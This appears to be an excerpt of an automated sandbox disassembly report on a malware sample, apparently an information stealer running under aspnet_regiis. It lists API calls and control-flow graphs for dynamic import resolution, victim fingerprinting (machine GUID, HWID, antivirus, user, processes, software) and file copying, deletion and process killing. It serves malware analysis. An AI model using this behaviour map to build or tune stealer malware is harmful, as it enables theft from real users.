                                                                                                                                                                    control_flow_graph 912 418643-418653 call 41859a 915 418844-4188a1 LoadLibraryA * 5 912->915 916 418659-41883f call 407d47 GetProcAddress * 20 912->916 918 4188a3-4188b0 GetProcAddress 915->918 919 4188b5-4188bc 915->919 916->915 918->919 920 4188e7-4188ee 919->920 921 4188be-4188e2 GetProcAddress * 2 919->921 923 4188f0-4188fd GetProcAddress 920->923 924 418902-418909 920->924 921->920 923->924 925 41890b-418918 GetProcAddress 924->925 926 41891d-418924 924->926 925->926 928 418926-41894a GetProcAddress * 2 926->928 929 41894f 926->929 928->929
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                                    • GetProcAddress.KERNEL32(75B30000,004184C2), ref: 004188AA
                                                                                                                                                                    • GetProcAddress.KERNEL32(751E0000,004184C2), ref: 004188C5
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                                    • GetProcAddress.KERNEL32(76910000,004184C2), ref: 004188F7
                                                                                                                                                                    • GetProcAddress.KERNEL32(75670000,004184C2), ref: 00418912
                                                                                                                                                                    • GetProcAddress.KERNEL32(77310000,004184C2), ref: 0041892D
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2238633743-0
                                                                                                                                                                    • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                                    • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                                                                    • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                                    • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                                                                                    Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 930 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                                      • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                                      • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                                      • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                                      • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                                      • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                      • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                      • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                      • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                      • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                      • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                      • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                      • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                      • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                                                                      • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                                      • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                                      • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                                      • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                      • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                      • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                      • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                      • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                      • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                      • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                      • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                      • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                      • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                      • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                      • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                      • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                      • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                      • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                      • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                      • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                      • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                      • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                      • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                      • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                                                                      • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                                                                      • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                                                                      • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                                                                      • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                                                                      • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                                                                      • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                                                                      • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                                      • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                                      • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                                      • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                                      • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                                      • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                                      • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                                      • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                                      • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                                      • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                      • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                      • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                      • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                      • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                      • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                                                                      • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                                                                      • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                                                                      • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                                                                      • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                      • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                      • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                      • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                      • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                                                                      • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                                      • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                                      • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                                      • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                                      • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                                                                      • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                                                                      • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                                                                      • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                                                                      • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                                                                      • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                                                                      • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                                                                      • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                                                                      • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                    • API String ID: 3634126619-1014693891
                                                                                                                                                                    • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                    • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                                                                    • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                                                                                    Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1774 40884c-408865 call 410795 1777 408867-40886c 1774->1777 1778 40886e-40887e call 410795 1774->1778 1779 408885-40888d call 410549 1777->1779 1783 408880 1778->1783 1784 40888f-40889f call 410795 1778->1784 1786 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 1779->1786 1783->1779 1784->1786 1791 408d72-408d96 call 402920 * 3 call 401cde 1784->1791 1822 408939-408949 CopyFileA 1786->1822 1823 408924-408936 call 410519 call 4122b0 1822->1823 1824 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 1822->1824 1823->1822 1837 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 1824->1837 1838 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 1824->1838 1871 408a60-408a79 call 402920 1837->1871 1838->1871 1880 408d4b-408d57 DeleteFileA call 402920 1871->1880 1881 408a7f-408a9a 1871->1881 1887 408d5c-408d6b call 402920 * 2 1880->1887 1889 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 1881->1889 1890 408d37-408d4a 1881->1890 1898 408d6d call 402920 1887->1898 1892 408cda-408ce7 1889->1892 1890->1880 1900 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 1892->1900 1901 408ced-408cf9 lstrlenA 1892->1901 1898->1791 1937 408ba3-408bb6 StrCmpCA 1900->1937 1938 408d97-408dd9 call 402920 * 8 1900->1938 1901->1890 1903 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 1901->1903 1914 408d2c-408d32 call 402920 1903->1914 1914->1890 1940 408bc0 1937->1940 1941 408bb8-408bbe 1937->1941 1938->1898 1942 408bc6-408bde call 410549 StrCmpCA 1940->1942 1941->1942 1949 408be0-408be6 1942->1949 1950 408be8 1942->1950 1952 408bee-408bf9 call 410549 1949->1952 1950->1952 1958 408c08-408cd5 lstrcatA * 14 call 402920 * 7 1952->1958 1959 408bfb-408c03 call 410549 1952->1959 1958->1892 1959->1958
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                                                                      • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                                                                      • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                                                                      • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                                                                    Strings
